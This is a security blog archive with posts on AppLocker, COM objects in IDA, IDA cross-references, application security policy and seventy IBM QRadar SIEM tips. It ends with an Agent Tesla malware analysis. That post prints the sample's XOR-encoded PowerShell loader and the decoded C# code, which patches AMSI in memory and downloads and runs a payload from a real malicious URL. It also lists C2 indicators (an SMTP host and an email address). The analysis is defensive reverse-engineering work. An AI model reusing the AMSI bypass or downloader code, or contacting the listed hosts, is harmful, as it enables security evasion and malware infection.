This folder is applocker blocked
Friday, February 5, 2021
AppLocker Block vs Sysmon Process Create
Sunday, January 3, 2021
OLE COM Objects OleInitialize CoCreateInstance
Notes from IDA
OleInitialize ==> tells you you're going to use COM
CoCreateInstance ==> Initializes an object, such as Internet Explorer Web Browser
rclsid ==> 0002DF01-0000-0000-C000-000000000045 is Internet Explorer
riid ==> D30C1661-CDAF-11D0-8A3E-00C04FC9E26E is Web Browser
So an example:
Url = "http://www.ebay.com"
OleInitialize()
CoCreateInstance("0002DF01....", null, CLSCTX_LOCAL_SERVER, "D30C1661....", ptr)
ptr.Navigator(Url, , , , ,)
Wednesday, December 30, 2020
IDA Pro Xref Notes
https://resources.infosecinstitute.com/topic/ida-cross-references-xrefs/
XREF , "...After the arrow, there’s also a single letter..."
- letter ‘j’ denotes the jump
- letter ‘p’ denotes the function call
DATA XREF, "...letters assigned after the arrow ..."
- letter ‘w’ denotes that the location is being written to
- letter ‘r’ denotes that the location is being read from
- letter ‘o’ denotes that the address of the location is being taken from it
Monday, November 2, 2020
Application Security Policies Ideas
Application Security Policy ideas. A thread for my #infosec friends ...
Make your policy applicable to all applications (internal, external, 3rd party hosted, custom built, off the shelf, outsourced, etc)
Require configuration management (change controls , CMDB, etc)
Require Testing evidence and approval prior to deployments
Require Vulnerability management and patching on a cadence , make sure to include all 3rd party add-one, libraries, and dependencies
Ensure separate environments for production vs non-production (different servers , different accounts , different databases)
Require Separation of Duties including code reviews performed by someone other than the developer and deployments done by someone other than the developer
Require logging (authentication, web , database, OS level, administrative logs) , store logs on a secondary system like a SIEM and prevent tampering.
Developers must perform input validation regardless of the source (text fields , url parameters , API parameters, input files, etc )
Passwords must be hashed and salted at rest , encrypted in transit , must meet a complexity policy that includes preventative commonly used ones, and passwords resets should occur using temporary expiring links.
Applications must include access control , at a minimum separating users from administrators.
Applications must follow least privilege for users and service accounts ensuring the accounts only have access to the functionality they require.
Sensitive data must be encrypted at transit and at rest.
Data should never be copied from Production to Non-Production without first being sanitized of sensitive data.
Purge data that is beyond required retention periods , and purge unused code , screens, and dependencies to reduce the attack surface.
Error screens displayed to users should not display code , technical detail or stack traces .
Administrative screens should not be public facing , but instead require VPN or internal network access to administer.
Contracts with software providers , hosters, development teams , etc should define who owns the data, who owns the compliance requirements, and also include SLAs for vulnerability response , incident notification and response.
Newly on-boarded developers must complete security training and read all security policies prior to writing any code.
Code reviews must check for the OWASP Top 10.
Source code must be stored in version control that records who made what changes and when.
Test websites should not be publicly exposed but instead require VPN or internal network access.
Email addresses on public facing sites should not be scrape-able to minimize malspam/phishing attack surface.
After any major changes , vulnerability scans must be re-run and the CMDB must be updated.
Require a re-occurring cadence of penetration testing your application from a source outside of your own team.
Have an emergency patching procedure and communication plan in place and test it on a cadence.
Implement all security gardening procedures provided by 3rd parties including at the application , web, database, and OS level.
Monitor and proactively ensure you prevent any end of life , end of support, or licensing restriction issues that could impact your ability to perform incident response.
Document and get the data owner’s approval for any exceptions to the application security policy.
Hope this helps you in your application security policy adventures my #infosec friends!
Tuesday, October 6, 2020
70 IBM Qradar SIEM Tips!
https://twitter.com/neonprimetime/status/1313222901236142080
Hey for all you #infosec friends stuck with #ibm #qradar just like me, just remember it’s still better than having no #siem at all. Here my contribution to the community, a mega thread of qradar tips to improve your life
#qradartips
0/N
Qradar Tip #1
equals is case sensitive
username equals 'neonprimetime'
will not find 'Neonprimetime'
(notice the capital N)
from the GUI use contains to be case insensitive!
#qradartips 1/N
Qradar Tip #2
avoid using the GUI for filtering
instead teach yourself AQL
use the "Advanced Search" drop down
it's a powerful SQL-like language
that will allow you to performance tune queries
use complex boolean logic
and much more!
https://www.ibm.com/support/knowledgecenter/SS42VS_7.3.3/com.ibm.qradar.doc/b_qradar_aql.pdf
#qradartips 2/N
Qradar Tip #3
offenses will get purged after a period of time
configure the retention under system settings
or if it's a major incident use the "Actions->Protect"
to permanently save an offense so it never gets deleted
#qradartips 3/N
Qradar Tip #4
be aware qradar has a max number of offenses it will create
after that it just stops creating them
keep your queue below 2500
notice if one particular alert goes nuts it could prevent your SOC from seeing any new offenses
https://www.ibm.com/support/knowledgecenter/en/SS42VS_7.3.2/com.ibm.qradar.doc/38750050.html
#qradartips 4/N
Qradar Tip #5
if you always filter on the same property (rules, reports, dashboards, aql) then index that field, if you don't index performance will be terrible (similar to indexing in a SQL db)
check the "Parse in advance for rules, reports, and searches" box
#qradartips 5/N
Qradar Tip #6
qradar coalescing is dangerous, you lose logs!
(event count > 1)
if event, ip, port & user match it collapses logs into 1 & you only see 1st one so you lose data in other logs like urls, process, etc.
consider disabling
https://www.ibm.com/support/pages/qradar-how-does-coalescing-work-qradar
#qradartips 6/N
Qradar Tip #7
reference sets are fast! it's like magic
want to search all 1000s of recent domain names from UrlHaus?
want to search 100s of Emotet C2 ip addresses all at once?
drop them all into a Reference Set & search
you will be surprised how fast it can be
#qradartips 7/N
Qradar Tip #8
the display drop down acts like a "group by"
its a super quick way to get a list of user
or a list of ip addresses
or a list of event names
you don't have to search->edit search, just use the display drop down instead
#qradartips 8/N
Qradar Tip #9
if you are not familiar with qradar
you may want to search by windows event ids such as 4688
problem is it seems dead slow event if indexed
a faster alernative is to find the QID (qradar id) instead
(continued)
#qradartips 9a/N
Qradar Tip #9
(continued) ... to find the QID a quick way i found is to click the "false positive" button
the QID will be displayed there
copy & paste it, return and search by QID instead of event id, the search will be indexed and much faster!
#qradartips 9b/N
Qradar Tip #10
performance tip
building new hunts/reports
don't search "last 24 hrs" as every time you update filters it'll re-runs the whole search due to the stop time changing
instead pick a start/end date so data is cached
this speeds up query building
#qradartips 10/N
Qradar Tip #11
if you need to search an unindexed field or use payload contains
1st prime it by running a larger indexed search against the same time frame
then re-run a 2nd search after adding your unindexed field
its actually faster to run 2 searches than 1!
#qradartips 11/N
Qradar Tip #12
if you want your offense to have pretty names such as Mitre Techniques
in rule response "dispatch a new event" with a the pretty name then under offense naming choose "should contribute" or "set or replace" the name
#qradartips 12/N
Qradar Tip #13
if you want qradar to only email you once a day per user for an offense
use the response limiter to configure that
there is a caveat however
if the response limiter is hit tip #12 will stop working and names gets ugly again
#qradartips 13/N
Qradar Tip #14
you probably knew that qradar does geo location if you hover over a remote ip
but did you know you can make it do the same thing for RFC 1918 internal private addresses?
just use the Country/Region drop down list on the Network Hierarchy screen
#qradartips 14/N
Qradar Tip #15
threat hunters will love using the QFlow feature
which allows you to display the first several bytes of requests & responses in the netflow / Network Hierarchy tab, real time packet viewing & even write alerts off them
https://www.ibm.com/support/knowledgecenter/SS42VS_7.3.3/com.ibm.qradar.doc/c_tuning_guide_deploy_qflow.html
#qradartips 15/N
Qradar Tip #16
did you know you can customize the right-click menu of some fields such as ip address
just modify the xml configuration on the qradar console
/opt/qradar/conf/ip_context_menu.xml
you can use the %IP% field for example to pass the IP address to other sites like Virus Total
https://www.ibm.com/support/knowledgecenter/SS42VS_7.3.3/com.ibm.qradar.doc/t_CUSTOMIZING_THE_RIGHT_CLICK_MENU.html
#qradartips 16/N
Qradar Tip #17
on log activity tab the default columns displayed aren't helpful
instead of going Search->Edit search every single time
you may want fields like URL, process name, etc. to show by default
Do this by editing the column layout, then his Save Criteria
leave it as real time (streaming) then check "Set as Default"
#qradartips 17/N
Qradar Tip #18
you may want a different column layout per objective
example: proxy layout, sysmon layour, antivirus layout
on search->edit search under column definition
choose your columns, enter a custom name and save
now it'll be in the drop down to choose each time
#qradartips 18/N
Qradar Tip #19
vendor app packs can give you solutions quickly
apps can give you pre-built custom fields, rules, and reports
they may require heavy tuning & performance considerations for your environment
but it could be a good starting point
#qradartips 19/N
Qradar Tip #20
log sources create their own fields
problem: u end up w/ multiple fields for same data
ex: proxy url, sysmon url, edr url, waf url
this creates a nightmare for SOC to search
tip: consolidate related custom fields into a single field like 'url'
#qradartips 20/N
Qradar Tip #21
sometimes it's easier in excel or notepad++
if you just want to dump the raw logs to excel
use Actions -> Export to CSV -> Full Export (all columns)
and find the column named 'payloadAsUTF'
now you have the raw logs to mess around with
#qradartips 21/N
Qradar Tip #22
worried about access control?
use the admin -> user roles to limit which screens users can access
#qradartips 22/N
Qradar Tip #23
want to control who sees which log sources?
use the admin -> security profiles
in conjunction with the log source groups screen
to restrict which users can access which log sources
#qradartips 23/N
Qradar Tip #24
have compliance requirements for log retention?
or have disk space/performance issues?
use the event retention screen to auto purge logs
based on whatever simple or complex query you want!
#qradartips 24/N
Qradar Tip #25
is your assets tab / profiler filled with complete junk?
use the asset profiler configuration -> manage identity exclusions
to exclude those invalid ip addresses, hostnames, mac addresses, etc.
based off saved searches
https://www.ibm.com/support/knowledgecenter/SSKMKU/com.ibm.qradar.doc/c_qradar_ug_asset_identity_exclusion.html
#qradartips 25/N
Qradar Tip #26
similar to reference sets, sometimes its nice to group certain log sources together for rules and hunts
try using 'log source groups' instead of reference sets or massive "or" statements
example: if a rule only applies to domain controllers, DHCP servers, or your IDS appliances
#qradartips 26/N
Qradar Tip #27
if you have a single system sending multiple log source types
ex: server sends windows events, sql logs, web logs, and app logs
you may notice incorrect parsing, web logs treated as sql, etc.
if so you may need to adjust the Log "Parsing Order"
#qradartips 27/N
Qradar Tip #28
qradar has a built-in rule wizard filter that allows you to monitor when a log source stopped sending logs
this can be helpful for example to monitor critical systems like DCs & get alerted immediately if broken
"event(s) have not been detected"
#qradartips 28/N
Qradar Tip #29
if a log source is in an ERROR or WARN state
clicking into the log will show a RED or YELLOW banner at top indicate the reason for the error
#qradartips 29/N
Qradar Tip #30
only want your alert to fire if something happens multiple times and when certain fields match or mismatch?
use one of the many rule wizard filters for many times with some fields the same and some fields different
#qradartips 30/N
Qradar Tip #31
did you create a dashboard but it defaults to some ugly table/bar chart?
switch to time series, check the "capture time series data" box
then be patient and wait (many hours sometimes) for the data to cache into the graph
now you can time scroll
#qradartips 31/N
Qradar Tip #32
logs coming in as Universal DSM w/ unknown name
unable to search by ip, port, or username?
add a log source extension or custom Dsm
it's just a bunch of regex in XML
it will allow you to parse out those critical fields and make them searchable
#qradartips 32/N
Qradar Tip #33
did you run a long slow search a few hours ago?
do you need the results again but don't want to wait to re-run it?
goto Search -> Manage Search Results
find your search for hours ago
click the "COMPLETED" link
the cached results return instantly!
#qradartips 33/N
Qradar Tip #34
did you make changes such as add a new user, add a log source, add a subnet
but the changes haven't taken effect yet and can't figure out why?
it may be waiting for you to "Deploy Changes" from the admin tab
#qradartips 34/N
Qradar Tip #35
did you know every time you create a dashboard time series or report it's essentially created a database table & storing the data somewhere
you can manage those tables/data including disabling or deleting by going to "Aggregated Data Management"
#qradartips 35/N
Qradar Tip #36
historical quirk to be aware of
i've seen issues with deleting an admin user
if they were the owner of a critical dashboard, rule, report, etc. it could break it
so at least initially its safer to "Disable" a termed user instead of "Delete"
#qradartips 36/N
Qradar Tip #37
are you trying to manipulate the Magnitude to adjust queue priorities?
i don't have good news for your here
"Magnitude calculations are proprietary to QRadar"
using the Magnitude adjustment rules & fields don't seem to make much impact
we use our SOAR platform to prioritize instead
https://www.ibm.com/mysupport/s/question/0D50z00006PEFAuCAP/how-magnitude-calculation-works?language=en_US
#qradartips 37/N
Qradar Tip #38
be careful after applying updates, DSM or app pack updates, etc.
qradar like to change regexes or disable your custom events properties
when that happens your rules break
monitor the 'last modified date' on custom event properties to find these anomalies
#qradartips 38/N
Qradar Tip #39
qradar actually audits itself!
you can write reports and rules to monitor qradar itself
such as who performed a search, who logged in, who added a user, etc.
#qradartips 39/N
Qradar Tip #40
performance tip
avoid custom event properties for an entire log source type
instead be specific, choose a event name or category for each custom event property to avoid parsing overhead
#qradartips 40/N
Qradar Tip #41
qradar log sources like to break together in groups
a good example is all qradar JDBC connections dropping at once during an update
use the log sources screen and sort by Last Event Time to look for such anomalies
#qradartips 41/N
Qradar Tip #42
getting crushed by EPS, FPS, cpu, or licensing issues?
use the log activity tab, group by log source type, log source, and event name to see the noisest log sources
such as a linux server set to debug syslogging
and start trimming your EPS
#qradartips 42/N
Qradar Tip #43
you can customize the offense close reasons for reporting/metrics purposes
under the actions->close
click the little edit icon (paper & pencil)
#qradartips 43/N
Qradar Tip #44
do you get emailed a report daily?
do you need an a copy of that report from several days ago but it's no longer in your inbox?
you can go to the reports screens, pull down the generated reports drop down, and find past reports to download
#qradartips 44/N
Qradar Tip #45
is your asset tab important & you can't lose the data?
consider occasionally exporting data (you can re-import later) or do db backups
many times during system/support issues i've seen the assets database get purged and start from scratch
#qradartips 45/N
Qradar Tip #46
event and flow direction are wonderful fields that allow you to identify if traffic is leaving the company, coming in, or traversing laterally based on your network hierarchy
L2L (local to local), L2R (local to remote), R2L (remote to local)
#qradartips 46/N
Qradar Tip #47
in AQL be careful, the like/ilike wildcard is a percent sign (%) , NOT AN ASTERICK!
ilike '%badstuff%'
#qradartips 47/N
Qradar Tip #48
in AQL, 'like' and 'matches' are case sensitive
'ilike' and 'imatches' are case insensitive
ilike '%badstuff%'
imatches '.*(bad|good).*'
#qradartips 48/N
Qradar Tip #49
in AQL more of a regex reminder
but if you're looking for ends with '.exe' for example
if you're using 'ilike' , then do not escape the period
ilike '%.exe'
if you are using imatches then yes you must escape the period
imatches '.*\.exe'
#qradartips 49/N
Qradar Tip #50
in AQL the "in" keyword is nice and saves you a ton of "or" statements
Method in ('POST', 'GET', 'PUT')
#qradartips 50/N
Qradar Tip #51
single tick vs double quote
double quotes go around custom fields/properties like "URL" and "User Agent"
you can avoid double quotes if the custom field has no spaces in it
single ticks go around string constants like 'PUT', 'POST', 'GET' or renaming a column like 'Total'
#qradartips 51/N
Qradar Tip #52
in AQL, N/A = null !
a common mistake i see is people trying to do
username = 'N/A'
that won't work, you must do
username is null
#qradartips 52/N
Qradar Tip #53
AQL tip
sometimes logs/parsing are messed up & for example sourceip = destinationip
include/exclude these anomalies by comparing 2 different fields in AQL!
(you can't do that in the GUI rule wizard or add filter wizard)
sourceip != destinationip
#qradartips 53/N
#qradartips #54
a qradar regex / rule gotcha
qradar seems to strip out certain special characters such as a plus ('+') sign probably to prevent injection attacks
a side effect this has is if you write a regex in a rule with a plus sign
it looks like it disappears (even though it's actually there and the rule works)
#qradartips 54/N
Qradar Tip #55
AQL big performance tip
normally in the GUI if you edit your search it gives you a popup & cancels your 1st search
in AQL, if you hit search, edit your search, hit search again, edit your search, hit search
you just launched multiple searches in parallel!
in AQL hit cancel BEFORE editing your search!
#qradartips 55/N
Qradar Tip #56
AQL performance tip
i prefer where clauses with QID/devicetype/logsourceid over qidname(), logsourcename(), logsourcetypename()
performance seems many times better, especially if you are used to using like/matches
i memorize/have index of the ID numbers and just use them
(continued)
#qradartips 56a/N
Qradar Tip #56
(continued)
if i don't know the qid/devicetype/logsourceid but i need it
i again find it faster to run 2 searches than 1
i 1st run a short (last 2 minutes) search to get the ids
then i run a 2nd search using the ids i found
#qradartips 56b/N
Qradar Tip #57
AQL performance tip
my starting point in almost every search is devicetype (aka log source type)
if i need 4688 process creates by nature that search is slow cause it'd search all events (Linux, Firewall, Windows events)
so narrow your search down to the correct devicetype first
#qradartips 57/N
Qradar Tip #58
Dashboard tip
tired of clicking "View log activity" to drill into the details of a graph?
use AQL to build the query w/ CONCAT that shows all the data you need!
select concat(computer, ', ', username, ', ', url) as 'ComputerUsernameSite'
#qradartips 58/N
Qradar Tip #59
AQL tip
count is powerful to indicate how many times something happened
but UNIQUECOUNT() is even better!
it can tell you how many unique users, or ips, processes, or urls were seen
#qradartips 59/N
Qradar Tip #60
Qradar stores multiple time fields
starttime = time qradar received the log
endtime (aka Storage Time) = time qradar finished processing it
devicetime (aka Log Source Time) = time from the actual log
(continued)
#qradartips 60a/N
Qradar Tip #60
(continued)
the time stamps are in integer format by default
you can sort them as normal using 'order by' and 'asc' or 'desc'
you can format them to display pretty with
dateformat(<field>, 'yyyy-MM-dd hh:mm a')
(continued)
#qradartips 60b/N
Qradar Tip #60
(continued)
most important is devicetime (when event actually logged)
unfortunately qradar indexes "last 2 hours" & "start/stop" on the starttime field
tip: compare devicetime vs starttime or starttime vs endtime to find performance issues!
#qradartips 60c/N
Qradar Tip #61
you can use the ever so powerful reference sets in AQL also!
REFERENCESETCONTAINS('reference set name', sourceip)
#qradartips 61/N
Qradar Tip #62
in AQL don't forget if aggregating (COUNT, SUM) to include your "group by" just like any SQL-like language
otherwise query will run but return unexpected results
select sourceip, UNIQUECOUNT(username) as 'Users' from events group by sourceip
#qradartips 62/N
Qradar Tip #63
sometimes certain fields are stupid long, perhaps legitimately or perhaps due to a parsing issue
you can use the STRLEN() function filter out or eliminate those long noisy fields
#qradartips 63/N
Qradar Tip #64
AQL tip
if you have your network hierarchy admin page configured
you can start searching for odd lateral movement
use the FULLNETWORKNAME() function against ip addresses
such as below seeing a workstation talking to a mobile device
#qradartips 64/N
Qradar Tip #65
AQL tip
you can search for odd connections to countries you don't do business in
use the sourcegeographiclocation and destinationgeographiclocation fields
#qradartips 65/N
Qradar Tip #66
if you expand the "Current Statistics" link on the log screen
it shows interesting stats like how many records were returned, how much data (MB or GB) were searched, and how long it took
#qradartips 66/N
Qradar Tip #67
my plug for AQL. learn it!
Search -> Edit Search is a slow nightmare
anytime you change column layout, add/remove column, sort by, etc. you get full screen refresh
just learn AQL!
adjust columns, sort/filter w/out leaving the screen!
#qradartips 67/N
Qradar Tip #68
don't forget Qradar has a full API available
just append "/api_doc" to the end of your qradar url instance
start reading up on it
then move to writing your python scripts and get out of the GUI completely
#qradartips 68/N
Qradar Tip #69
you can execute sample API requests right from the GUI
and learn what the CURL statements would look like, etc.
just append '/api_doc' to the end of your url again and drill into the different areas
#qradartips 69/N
Qradar Tip #70
manage who or what can access your API with the "Authorized Services" admin screen
#qradartips 70/N
If you got this far and read all tips, thank you!
I hope this helps you, my #infosec friends, to improve your experience with #ibm #qradar #siem
#qradartips
Tuesday, September 15, 2020
How we use Agile Scrum for SIEM Detection Engineering and Threat Hunting
Tuesday, August 4, 2020
Agent Tesla , Doc => Powershell => C# => EXE => SMTP
88cd18b7fbe649bd756b3034525f34c3
function funcDecodeNetClassSourceCode { param($paramEncodedNetClassSourceCode) $xorKey='s7c5f8'; $varDecodedNetClassSourceCode=''; for ($i=0; $i -lt $paramEncodedNetClassSourceCode.length; $i+=2){ $varEncodedHexBytes=[convert]::ToByte($paramEncodedNetClassSourceCode.Substring($i,2),16); $varDecodedChar=[char]($varEncodedHexBytes -bxor $xorKey[($i/2)%$xorKey.length]); # write-host ("Encoded: {0} , Decoded: {1}" -f ($varEncodedHexBytes, $varDecodedChar)) # watch every character get xor decoded $varDecodedNetClassSourceCode+=$varDecodedChar } return $varDecodedNetClassSourceCode; } $varEncodedNetClassSourceCode = '06440a5b0118204e104103554842105c085f53641a46125d1e193140084c1a5a061b2f560752115a166b1645155c055d000c16460f561417304c154c165a4d710f5914590c4612511044584015511d5043661f4b07520e1b2f774842105c085f53641a46125d1e192d5012037e3d134004541a5443560a590044434c05014700054e3d7c1f5b2a58165701434b170d5d01590659550a511b265b124a0a670c5c084c4e152450126801580074025c0152104644112e4716570a5110171041074c1a5443501e4c16450d152f5607671747465d460e540105103a591765124a5352060005005f4417470f5614171756500d110f071c5d63375b0f7c0b481c45171d445316450d500a0b41154f70084c014e335a0f56070a41790959177b0a571459014e411c3b4806550f5c0518004302410f5b53521b41034a1d172a5b1268074543475f5d150e551d154c015e0d52464f42535b065e11486c27590a711e470c471210515c0647085d1f0451174a7d1d43114c36571a591708446e1a451740075423450c41035b07154a68164d115b0a56464b0756175c0518164f1750145653550c5a0a1802015a0754595b7e0d41364c01171206525b1704561933711d433341141817565a54505e421b165c084c53515753505b5f581641464d1a591715035d120507544f0328730f592f55035811414e1a3852115b035440054d510a54511b265b124a0a670c5c084c4e1531410a751c41067803551c451a174a6b16432f54154c3645115a140515560f4603112e44175412511017064d125d015943430951171712545e0f4403001d2f560767174746504b550751050e5f7e0d41364c01170000055c121b0a5b121809555b045500171e5845135a1f5e0015154c12430a5646511d43435b000b4456021d4f433a591765124a535d0500570c4e455a500001451f1407040d16524b17570a46565205535b470f5656575e4655411c4f031a514b5f000d420342082f5607671747486216450c1c1d711d43334114181d00540c050516025a02525b5b5d0500570c5f405157535d161f4106540d12065300050b46020104540d4a055201560843020604500c46154a1c5d51151f0d02510110165e7c084c2343111b3c5d01584a4e33711d43334114180253000253055b622a5b126807454a005d4d1a591715175b465157025b08485e051d170e4a0551544e5644005a564a49175454004a080b035319094d07171256535e47004a1c1d7a0a43066e3b18100f0756070508071b065714434f05534a080b0e53485d711d4333411418160f550602053e5611460e591f1922590a57107f2459095a125b4b064f033e5611460e591f19205a16415b545b5105595f074f505e0e40534f064f0302565b02510c101f0d5011183a591765124a5b5954025f5b5d630c7c084c45034b1c4d080b07530404115f525b03555c5f044a0e1b450e4417470f5614171057500b440a265b105101580d58035607192450127e1c5b0750146812430b1d2356055e115a08551659171b354816540a540a7e1c5b07501416324713590f5b12430a5a087c1243021c461353153f69005c400e50575e1a531c4342545a4652061d440d17025104040d43154a0e085d04173450047b1f5e065b12105a19275a11561f58025120511f524b42545a4652061d440911035004510c46020004510d10025204500d41070501050944025105540d45075401040941065a04570d12035a01000840060205560d12075b01050945025a045109120650015e0947035605540d42075004510946020605000d43065604510910025605070911075001560945154a19155a4504541c5d6801580050154b2043024712711d510c151e5b11020508085d04173347095b16441066125901432a5b00575b440103550f5a0c3347095b1644101b354c1245171d1e5b1102051c5d4a164316470818430c1e45135a1f5e0015154c12430a56464b07450a5b011804050100035d5b4417470f56141717505f5b411e1846124a1a590415035d46545b08444b445456535e1a484417470f561417110c035e4a015e1744031558111d0f5607170a085603535e5f41030110054d79035614430b0e0f134e054a4e04410752435053014403000825571d41064712162758214c125d5b43060c050a5d641657154c015e0d524e515f054a19570e5a0c110c035e4a0148084e5b1b56111c4e5d460e54010566165256565e635b5e4c074f1d165256565e163f520d5212502e1e5848145d0742115b464a4a52050c50030e4a'; $varNetClassSourceCode = funcDecodeNetClassSourceCode($varEncodedNetClassSourceCode); write-host ("Everything Decoded: {0}" -f $varNetClassSourceCode) # Add-Type -TypeDefinition $varNetClassSourceCode; # add malicious code to this powershell session # [yc947f]::nf37aa(); # initiate malicious code by calling function within the decoded class --------------------- Results --------------------- Everything Decoded: using System;using System.Runtime.InteropServices;using System.Diagnostics;using System.IO;using System.N et; public class yc947f{[DllImport("kernel32",EntryPoint="GetProcAddress")]public static extern IntPtr e5974c(IntPtr ee5c8,string tc65b8d);[DllImport("kernel32",EntryPoint="LoadLibrary")]public static extern IntPtr r9ef96(string w1d838);[DllImport("kerne l32",EntryPoint="VirtualProtect")]public static extern bool q6922a(IntPtr q34cd35,UIntPtr da9a6f1,uint f4f6c,out uint eea2da) ;[DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)]static extern void qa8774c(IntPtr h8bddc6,IntPtr c5 cda,int zb8138d);public static int nf37aa(){IntPtr jf514=r9ef96(w2b5ee("125a105c485c1f5b"));if(jf514!=IntPtr.Zero){IntPtr n77 9c=e5974c(jf514,w2b5ee("325a105c355b12592140005e1645"));if(n779c!=IntPtr.Zero){UIntPtr qdc75=(UIntPtr)5;uint qc5f47=0;if(q692 2a(n779c,qdc75,0x40,out qc5f47)){Byte[] c8dca={0x31,0xff,0x90};IntPtr e863d=Marshal.AllocHGlobal(3);Marshal.Copy(c8dca,0,e863 d,3);qa8774c(new IntPtr(n779c.ToInt64()+0x001b),e863d,3);}}}string sb637=Environment.GetFolderPath(Environment.SpecialFolder. ApplicationData) + "\\fd393b8" + w2b5ee("5d521b50");new WebClient().DownloadFile(w2b5ee("1b4317455c175c5116520f4c17520256074b 1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016"),sb637);ProcessStartInfo xcb5f=new ProcessStartIn fo(sb637);Process.Start(xcb5f);return 0;}public static string w2b5ee(string te9c2){string ee5c8="s7c5f8";string r9ef96="";for (int i=0; i<te9c2.Length;i+=2){byte e5974c=Convert.ToByte(te9c2.Substring(i,2),16);r9ef96+=(char)(e5974c^ee5c8[(i/2)%ee5c8.Le ngth]);}return r9ef96;}}
https://app.any.run/tasks/27f1e600-b8fc-4c18-a6f0-b35799393cdc/ 88cd18b7fbe649bd756b3034525f34c3 using System; using System.Runtime.InteropServices; using System.Diagnostics; using System.IO; using System.Net; # [yc947f]::nf37aa() # malicious entry point public class yc947f{ [DllImport("kernel32",EntryPoint="GetProcAddress")] public static extern IntPtr funcKernel32GetProcAddress(IntPtr paramHandleToDll,string paramLibraryName); [DllImport("kernel32",EntryPoint="LoadLibrary")] public static extern IntPtr funcKernel32LoadLibrary(string paramDllName); [DllImport("kernel32",EntryPoint="VirtualProtect")] public static extern bool funcKernel32VirtualProtect(IntPtr paramMemoryAddress,UIntPtr paramMemorySize,uint paramNewProtectionValue,out uint paramOldProtectionValue); [DllImport("Kernel32.dll",EntryPoint="RtlMoveMemory",SetLastError=false)] static extern void funcKernel32RtlMoveMemory(IntPtr paramDestinationAddress,IntPtr paramSourceAddress,int paramLengthOfBytes); public static int nf37aa(){ # malicious entry point, patching AMSI Dll and a C# downloader string varDllName = funcDecodeString("125a105c485c1f5b"); Console.WriteLine(String.Format("Dll: {0}", varDllName)); IntPtr varHandleToDll=funcKernel32LoadLibrary(varDllName); if(varHandleToDll!=IntPtr.Zero){ string varFunctionName = funcDecodeString("325a105c355b12592140005e1645"); Console.WriteLine(String.Format("Function: {0}", varFunctionName)); IntPtr varHandleToFunction=funcKernel32GetProcAddress(varHandleToDll,varFunctionName); if(varHandleToFunction!=IntPtr.Zero){ UIntPtr varMemorySize=(UIntPtr)5; uint varOldProtectValue=0; if(funcKernel32VirtualProtect(varHandleToFunction,varMemorySize,0x40,out varOldProtectValue)){ Byte[] var3BytesToCopy={0x31,0xff,0x90}; IntPtr varHandleToAllocatedMemory=Marshal.AllocHGlobal(3); Marshal.Copy(var3BytesToCopy,0,varHandleToAllocatedMemory,3); # funcKernel32RtlMoveMemory(new IntPtr(varHandleToFunction.ToInt64()+0x001b),varHandleToAllocatedMemory,3); # overwrite bytes in function } } } string varFileName = funcDecodeString("5d521b50"); Console.WriteLine(String.Format("File: {0}", varFileName)); string varFileFullPath=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\fd393b8" + varFileName; Console.WriteLine(String.Format("Path: {0}", varFileFullPath)); string varUrl = funcDecodeString("1b4317455c175c5116520f4c17520256074b1219115a494f031a005a084c1659171a1348144502510317155e0f5015171c550a1b034016"); Console.WriteLine(String.Format("Url: {0}", varUrl)); new WebClient().DownloadFile(varUrl,varFileFullPath); # download the malware ProcessStartInfo varProcessToRun=new ProcessStartInfo(varFileFullPath); # Process.Start(varProcessToRun); # run the malware return 0; } public static string funcDecodeString(string paramEncodedString){ string varXorKey="s7c5f8"; string varDecodedString=""; for (int i=0; i<paramEncodedString.Length; i+=2){ byte varEncodedByte=Convert.ToByte(paramEncodedString.Substring(i,2),16); varDecodedString+=(char)(varEncodedByte^varXorKey[(i/2)%varXorKey.Length]); } return varDecodedString; } }
Dll: amsi.dll Path: C:\Users\Win7\AppData\Roaming\fd393b8.exe Url: http://fugitdeacasa.ro/wp-content/upgrade/files/obi.exe Agent Tesla c2 terminal6.veeblehosting.com tcp port 587 https://app.any.run/tasks/ca52c30e-92fb-41ee-92cf-0483b357cbfb https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/community
agent tesla https://www.virustotal.com/gui/file/ff62a08f679ddad3fae88ea47a3985d003c5dc252e826feac7f59a366487b328/behavior/C2AE smtp port 587 "terminal6.veeblehosting.com" "obi@a-t-mould.com" {obi@a-t-mould.com} {obi@a-t-mould.com}